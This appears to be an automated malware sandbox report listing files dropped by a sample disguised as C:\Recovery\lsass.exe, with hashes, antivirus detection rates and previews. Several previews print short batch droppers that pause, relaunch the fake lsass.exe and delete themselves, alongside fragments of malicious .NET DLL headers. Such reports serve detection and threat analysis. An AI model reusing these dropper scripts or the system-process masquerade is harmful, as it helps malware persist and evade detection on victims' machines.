                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\hR2MTpBDVc.bat"
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):149
                                      Entropy (8bit):5.1219832604692295
                                      Encrypted:false
                                      SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7vEvIvBktKcKZG1t+kiE2J5xAIKb1LHEh:hCRLuVFOOr+DE7vvvKOZG1wkn23fgK
                                      MD5:955EBCA762F9346743BBF41C0AA48861
                                      SHA1:9D81AF8CFC2CDF05346F566A8CF981E0362BD65B
                                      SHA-256:F129E0296E9F15BE7D0A9CA458027515AEBCE378B6F107EA34F286FEC29850FA
                                      SHA-512:45686673A2033736F9B3B0887B39B431229147734870920B83954A01D3AD664DE75C45ED6B02FFD9A4934416EFEA21F4E0B05E7E05CB2AC331A2BD88C3B7147D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\jUHUXwf87c.bat"
                                      Process:C:\Recovery\lsass.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):149
                                      Entropy (8bit):5.062573804028863
                                      Encrypted:false
                                      SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7vEvIvBktKcKZG1t+kiE2J5xAI79H:hCRLuVFOOr+DE7vvvKOZG1wkn23f7l
                                      MD5:34502D4556D04B98C8375E6496ECC131
                                      SHA1:1A2C03CF89DE8F66B50F0DE89C108CBB26564651
                                      SHA-256:79A98FCD1A811321E3B57F45E46746F65677E14F4F9F541B190BCBE8A550B501
                                      SHA-512:F9CB0A156A44A6584E392AB5519C89AE7C456197C4B90FEF70E7FF7443290301BFB285CB455B29DA672963175F7B1F9DE6E1AC427A1F5493271164C1B4589DE1
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\nhkbaghNki.bat"
                                      Process:C:\Recovery\lsass.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.323856189774723
                                      Encrypted:false
                                      SSDEEP:3:FpST3cfjAk:HSa
                                      MD5:92FCF7F5EB5EC1423C6FB3908C608390
                                      SHA1:3CC0CE3A956EC910CB32089C75FD8466362E7AEC
                                      SHA-256:CBAF1F04DC840F1ACAB4AE77457945B6B6499E85AA5F3428F81561E05A29B5EF
                                      SHA-512:36C9C5B62CBF49EDAAA1C24DDFDD8A37342FF770D82FAB98558913D143125FE35F235B78E6FA1457C114B804762D16516238B4FDB46E054DBE91E8C70D6C62CC
                                      Malicious:false
                                      Preview:tOaU9wsqqKyXB6bVxFOWKvP6A
                                      Process:C:\Recovery\lsass.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):197
                                      Entropy (8bit):5.096497895786488
                                      Encrypted:false
                                      SSDEEP:3:mKDDVNGvT2XuFK+KdTVpM3No+HK9ATSV+jn9m7vEvIvBktKcKZG1t+kiE2J5xAIi:hCijTg3Nou1SV+DE7vvvKOZG1wkn23fi
                                      MD5:CB70F0CA31CFF45F75CE941678D937B7
                                      SHA1:A798105B728FE4AD17D5CFA736EAEE4C2AA438AF
                                      SHA-256:1D97F8EC22134EDA2210DF95DCA15DA7DD9BDCA5E42428E466413C254FE29654
                                      SHA-512:E2669177FD2B695413F9E1390567E09FBF96D1A95A33ED5E9C651DD7C90F73F67E603FA23533AE891031AAA690311FDDAAC677B183A1EDA979AC19CBF4E7DA64
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qoP5fBU7F9.bat"
                                      Process:C:\Recovery\lsass.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):197
                                      Entropy (8bit):5.012805098664586
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DE7vvvKOZG1wkn23ft4:HTg9uYDE7vrfS
                                      MD5:25742114222CCB1DED29CDFD2BC1477A
                                      SHA1:84E4A12FFE16506FDA1E7D96B8D55233803F3040
                                      SHA-256:62B0C13B3D2981F6E24EB53777D4AE7A10F93F6EEB62C37FD57E4884D0790323
                                      SHA-512:E78B4B2A3971F5E414FCFA1B7DB38A0BBDB4B4D23EF860268366E6D9E18BA3337AC9EDAC870675B025828C634D8DD2F1A496C83742F4DB458E20F14711E38222
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\riciCmDgnt.bat"
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):85504
                                      Entropy (8bit):5.8769270258874755
                                      Encrypted:false
                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):32256
                                      Entropy (8bit):5.631194486392901
                                      Encrypted:false
                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 25%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):69632
                                      Entropy (8bit):5.932541123129161
                                      Encrypted:false
                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 50%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):32256
                                      Entropy (8bit):5.631194486392901
                                      Encrypted:false
                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 25%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):85504
                                      Entropy (8bit):5.8769270258874755
                                      Encrypted:false
                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):23552
                                      Entropy (8bit):5.519109060441589
                                      Encrypted:false
                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):32256
                                      Entropy (8bit):5.631194486392901
                                      Encrypted:false
                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 25%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):85504
                                      Entropy (8bit):5.8769270258874755
                                      Encrypted:false
                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):23552
                                      Entropy (8bit):5.519109060441589
                                      Encrypted:false
                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):23552
                                      Entropy (8bit):5.519109060441589
                                      Encrypted:false
                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):32256
                                      Entropy (8bit):5.631194486392901
                                      Encrypted:false
                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 25%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):23552
                                      Entropy (8bit):5.519109060441589
                                      Encrypted:false
                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):85504
                                      Entropy (8bit):5.8769270258874755
                                      Encrypted:false
                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):23552
                                      Entropy (8bit):5.519109060441589
                                      Encrypted:false
                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):23552
                                      Entropy (8bit):5.519109060441589
                                      Encrypted:false
                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):69632
                                      Entropy (8bit):5.932541123129161
                                      Encrypted:false
                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 50%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                      Process:C:\Recovery\lsass.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
